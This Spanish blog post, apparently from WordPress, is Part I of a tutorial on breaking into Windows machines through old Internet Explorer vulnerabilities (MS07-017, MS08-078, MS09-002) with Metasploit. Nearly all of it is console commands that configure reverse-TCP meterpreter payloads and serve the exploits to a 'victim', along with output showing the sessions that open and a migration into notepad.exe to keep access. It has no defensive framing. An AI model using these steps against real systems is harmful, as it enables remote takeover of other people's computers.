Inicio > Hacking, MetaSploit > Penetrando Sistemas Windows con MetaSploit FrameWork – Parte I

Penetrando Sistemas Windows con MetaSploit FrameWork – Parte I


CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte I

En esta ocasión se indicarán algunas vulnerabilidades que pueden ser empleadas con el fin de comprometer sistemas bajo plataformas Windows usando MetaSploit Faremwork, cabe anotar que casi todos los exploits que se detallan a continuación, funcionan correctamente en casi todas las implementaciones de Windows, pero dependen directamente de la versión de IE instalada en la maquina objetivo.

Vulnerabilidad ANI

Se trata de una vulnerabilidad tradicional de buffer overflow que afecta a maquinas bajo Windows XP, 2003, 2008 y Vista, aprovechando una dirección de memoria vulnerable a ser sobrescrita y manipulada al gusto del atacante (o expresado de un modo mas adecuado, al gusto del programador) que es común a navegadores web tales como IE 6.X, IE 7.X, Opera, Safari y Firefox, su uso desde Metasploit resulta muy sencillo, como la mayoría de exploits desde la consola de MSF.

msf exploit(handler) > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH / yes The URI to use.

Exploit target:

Id Name

– —-

0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444

LPORT => 4444

msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVPORT 8080

SRVPORT => 8080

msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4444

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.34:8080/

[*] Server started.

Una vez la víctima entra en la dirección donde se encuentra en ejecución el servicio MetaSploit, se envía el stager y se abre una sesión meterpreter.

msf exploit(ms07_017_ani_loadimage_chunksize) >

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending HTML page to 192.168.1.36:49280…

[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.36:49280…

[*] Sending stage (749056 bytes) to 192.168.1.36

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.36:49281) at Thu May 12 22:44:24 +0200 2011

VULNERABILIDAD EN DATA BINDING

Vulnerabilidad sobre las funciones de Data Binding XML de Internet Explorer 6.0, 7.0 y 8.0, el modulo existente en Metasploit para explotar esta vulnerabilidad utiliza una técnica llamada “Inyección de DLL en memoria con .NET” que crea un objeto vtable en una ubicación conocida con todos los métodos de dicho vtable apuntando hacia el payload del atacante, dado que el segmento .text (segmento ejecutable en Assembly) de la DLL de .NET no es escribible, un stub de código predefinido es utilizado para copiar el payload en un nuevo segmento de memoria y continuar la ejecución desde allí.

msf > use exploit/windows/browser/ms08_078_xml_corruption

msf exploit(ms08_078_xml_corruption) > show options

Module options (exploit/windows/browser/ms08_078_xml_corruption):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique: seh, thread, none, process

LHOST 192.168.1.33 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

– —-

0 Automatic

msf exploit(ms08_078_xml_corruption) > set LPORT 4446

LPORT => 4446

msf exploit(ms08_078_xml_corruption) > set SRVPORT 8082

SRVPORT => 8082

msf exploit(ms08_078_xml_corruption) > set URIPATH /

URIPATH => /

msf exploit(ms08_078_xml_corruption) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:4446

[*] Using URL: http://0.0.0.0:8082/

[*] Local IP: http://192.168.1.33:8082/

[*] Server started.

Cuando el navegador de la victima accede a la ruta anteriormente establecida, se envía la DLL y comienza la corrupción de memoria, si resulta exitosa dicha inyección, se obtiene una sesión meterpreter.

msf exploit(ms08_078_xml_corruption) >

[*] Sending DLL to 192.168.1.40:49229…

[*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229…

[*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229…[*] Sending exploit HTML to 192.168.1.40:49229 token=dll…

[*] Sending stage (749056 bytes) to 192.168.1.40

[*] Meterpreter session 2 opened (192.168.1.33:4446 -> 192.168.1.40:49230) at Sat May 14 22:52:28 +0200 2011

Memory Corruption CfunctionPointer IE 7 (Windows XP/Vista)

Se trata de una vulnerabilidad relacionada con la función CfunctionPointer que consiste básicamente, en el aprovechamiento de un fallo de implementación de dicha función en donde se intenta acceder a memoria sin inicializar, de esta forma un atacante podría acceder remotamente, explotar esta vulnerabilidad y ejecutar código arbitrario en el sistema con los privilegios de la víctima.

msf > use exploit/windows/browser/ms09_002_memory_corruption

msf >exploit(ms09_002_memory_corruption) > show options

Module options (exploit/windows/browser/ms09_002_memory_corruption):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Exploit target:

Id Name

– —-

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms09_002_memory_corruption) > set LPORT 4445

LPORT => 4445

msf exploit(ms09_002_memory_corruption) > set SRVPORT 8082

SRVPORT => 8082

msf exploit(ms09_002_memory_corruption) > set URIPATH /

URIPATH => /

msf exploit(ms09_002_memory_corruption) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4446

[*] Using URL: http://0.0.0.0:8082/

[*] Local IP: http://192.168.1.34:8082/

[*] Server started.

Una vez un cliente ha entrado desde el navegador a la ruta donde se encuentra el servicio de metasploit ejecutándose, inmediatamente se obtiene una sesión meterpreter. Como característica interesante, el exploit intenta migrar el proceso a otro distinto con el fin de garantizar el acceso en el caso de que la víctima cierre el navegador.

msf exploit(ms09_002_memory_corruption) >

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 192.168.1.36:49356…

[*] Sending stage (749056 bytes) to 192.168.1.36

[*] Meterpreter session 2 opened (192.168.1.34:4446 -> 192.168.1.36:49357) at Fri May 13 00:17:32 +0200 2011

[*] Session ID 2 (192.168.1.34:4446 -> 192.168.1.36:49357) processing InitialAutoRunScript ‘migrate -f’

[*] Current server process: iexplore.exe (1172)

[*] Spawning a notepad.exe host process…

[*] Migrating into process ID 1896

[*] New server process: notepad.exe (1896)

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

Únete a otros 923 seguidores

%d personas les gusta esto: